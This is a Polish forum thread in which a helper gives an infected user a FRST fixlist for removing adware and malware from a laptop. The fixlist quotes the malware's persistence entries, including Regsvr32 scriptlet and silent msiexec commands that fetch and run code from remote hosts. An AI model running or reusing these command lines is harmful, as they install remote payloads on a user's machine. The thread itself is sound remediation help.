Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Zainfekowany laptop-luckystarting

matysmo 22 Kwi 2017 15:36 363 2
  • #1 22 Kwi 2017 15:36
    matysmo
    Poziom 2  

    @Kolobos,
    cześć, mam od kilku dni taki sam problem jak kolega powyżej, pomógłbyś mi z fixlogiem?
    W załączniku logi z FRST.
    Pozdrawiam,
    Krzysiek

    Moderowany przez RADU23:

    Wydzieliłem jako nowy temat.
    Nie podpinaj się pod cudze wątki. Powoduje to bałagan na forum.

    0 2
  • #2 22 Kwi 2017 15:47
    Kolobos
    Spec od komputerów

    Zgraj zakladki z Chrome oraz Firefox. Obie przegladarki odinstaluj.

    Wykonaj Fixlist.txt dla FRST:
    Task: {9D96AEE9-DF6F-4E51-ACD6-AFFAAC69061E} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xMTF1MdU8FUJYNjZXMWQLOYF3MjU5RkMdMTRXOYU8RH== scrobj.dll
    Task: {AEB73C74-BA22-4762-92AA-83390FCC60D7} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xMTF1MdU8FUJYNjZXMWQLOYF3MjU5RkMdMTRXOYU8RH== scrobj.dll
    Task: {C051D1DE-70BE-4122-B91E-AB00AFB1088D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () <==== UWAGA
    Shortcut: C:\Users\Piotr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    2017-04-17 18:04 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
    HKU\S-1-5-21-855689188-3516967254-2003997468-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xMTF1MdU8FUJYNjZXMWQLOYF3MjU5RkMdMTRXOYU8RH== /q
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    FF ProfilePath: C:\Users\Piotr\AppData\Roaming\Firefox\Firefox\Profiles\4i93wtfh.default [2017-04-19]
    FF Extension: (FF Adr) - C:\Users\Piotr\AppData\Roaming\Firefox\Firefox\Profiles\4i93wtfh.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Piotr\AppData\Roaming\Firefox\Firefox\Profiles\4i93wtfh.default\searchplugins\startsearch.xml [2017-04-19]
    HKU\S-1-5-21-855689188-3516967254-2003997468-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 3DM; C:\Users\Piotr\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
    R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
    R2 Kitty; C:\Users\Piotr\AppData\Local\Kitty\Kitty.dll [754688 2017-04-19] (kitty.dll) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SNARE; C:\Users\Piotr\AppData\Local\SNARE\Snarer.dll [793600 2017-04-17] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\Piotr\AppData\Roaming\WinSAPSvc\WinSAP.dll [568320 2017-04-21] (winsap) [Brak podpisu cyfrowego] <==== UWAGA
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA




    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
    2017-04-22 15:07 - 2017-04-22 15:07 - 00000000 ____D C:\Program Files (x86)\temp
    2017-04-20 09:06 - 2017-04-21 21:28 - 00000000 _____ C:\windows\SysWOW64\22
    2017-04-20 09:06 - 2017-04-21 21:28 - 00000000 _____ C:\windows\SysWOW64\11
    2017-04-19 21:21 - 2017-04-19 21:21 - 00000000 ____D C:\Users\Piotr\AppData\Local\3DM
    2017-04-17 18:07 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\windows\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-17 18:07 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\windows\system32\Drivers\iSafeNetFilter.sys
    2017-04-17 18:05 - 2017-04-21 13:29 - 00002014 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-04-17 18:05 - 2017-04-19 21:21 - 00000000 ____D C:\Users\Piotr\AppData\LocalLow\Mozilla
    2017-04-17 18:05 - 2017-04-17 18:05 - 00000000 ____D C:\Users\Piotr\AppData\Roaming\Firefox
    2017-04-17 18:05 - 2017-04-17 18:05 - 00000000 ____D C:\Users\Piotr\AppData\Local\Firefox
    2017-04-17 18:05 - 2017-04-17 18:05 - 00000000 ____D C:\Users\Piotr\AppData\Local\Eastness
    2017-04-17 18:04 - 2017-04-22 08:52 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 18:04 - 2017-04-21 21:28 - 00003600 _____ C:\windows\System32\Tasks\Milimili
    2017-04-17 18:04 - 2017-04-21 21:28 - 00000000 ____D C:\Users\Piotr\AppData\Roaming\WinSAPSvc
    2017-04-17 18:04 - 2017-04-21 21:28 - 00000000 ____D C:\Users\Piotr\AppData\Local\Kitty
    2017-04-17 18:04 - 2017-04-21 21:28 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 18:04 - 2017-04-17 18:04 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 18:04 - 2017-04-17 18:04 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 18:03 - 2017-04-17 18:04 - 00000000 ____D C:\Users\Piotr\AppData\Local\SNARE
    2017-04-17 18:03 - 2017-04-17 18:04 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 15:39 - 2017-04-13 15:40 - 00003576 _____ C:\windows\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 15:38 - 2017-04-13 15:38 - 00000000 ____D C:\Users\Piotr\AppData\Roaming\SSMgre
    2017-04-11 22:34 - 2017-04-13 15:40 - 00003566 _____ C:\windows\System32\Tasks\PowerWord-SCT-JT
    EmptyTemp:

    W FRST wybierz Napraw.

    Po wykonaniu zainstaluj Chrome i FF ponownie.

    0
  • #3 22 Kwi 2017 16:43
    matysmo
    Poziom 2  

    Dziękuję za pomoc.
    Pozdrawiam serdecznie,
    Krzysiek

    0